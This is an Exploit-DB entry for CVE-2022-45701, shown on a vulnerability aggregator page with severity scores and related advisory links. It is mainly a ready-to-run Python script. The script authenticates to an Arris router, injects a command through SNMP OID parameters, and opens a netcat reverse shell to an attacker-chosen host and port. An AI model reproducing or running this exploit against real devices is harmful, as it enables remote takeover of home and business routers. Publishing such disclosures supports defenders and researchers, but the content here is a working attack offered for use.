Lucene search
Yerodin RichardsEDB-ID:51269HistoryApr 06, 2023 - 12:00 a.m.
Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
2023-04-0600:00:00
Yerodin Richards
www.exploit-db.com
142
arris router
firmware 9.1.103
remote code execution
authenticated
commscope
cve-2022-45701
tg2482a
tg2492
sbg10
http
base64
payload
cookie
snmpset
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.027 Low
EPSS
Percentile
90.5%
# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701
import requests
import base64
router_host = "http://192.168.0.1"
username = "admin"
password = "password"
lhost = "192.168.0.6"
lport = 80
def main():
print("Authorizing...")
cookie = get_cookie(gen_header(username, password))
if cookie == '':
print("Failed to authorize")
exit(-1)
print("Generating Payload...")
payload = gen_payload(lhost, lport)
print("Sending Payload...")
send_payload(payload, cookie)
print("Done, check shell..")
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def no_encode_params(params):
return "&".join("%s=%s" % (k,v) for k,v in params.items())
def get_cookie(header):
url = router_host+"/login"
params = no_encode_params({"arg":header, "_n":1})
resp=requests.get(url, params=params)
return resp.content.decode('UTF-8')
def set_oid(oid, cookie):
url = router_host+"/snmpSet"
params = no_encode_params({"oid":oid, "_n":1})
cookies = {"credential":cookie}
requests.get(url, params=params, cookies=cookies)
def gen_payload(h, p):
return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"
def send_payload(payload, cookie):
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)
if __name__ == '__main__':
main()Related
cve
cve
CVE-2022-45701
2023-02-17 15:15:12
prion
prion
Remote code execution
2023-02-17 15:15:00
nvd
nvd
CVE-2022-45701
2023-02-17 15:15:12
zdt
zdt
Arris Router Firmware 9.1.103 Remote Code Execution Exploit
2023-02-15 00:00:00
malwarebytes
malwarebytes
Arris router vulnerability could lead to complete takeover
2023-02-16 10:00:00
cvelist
cvelist
CVE-2022-45701
2023-02-17 00:00:00
packetstorm
packetstorm
Arris Router Firmware 9.1.103 Remote Code Execution
2023-02-15 00:00:00
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.027 Low
EPSS
Percentile
90.5%
Related for EDB-ID:51269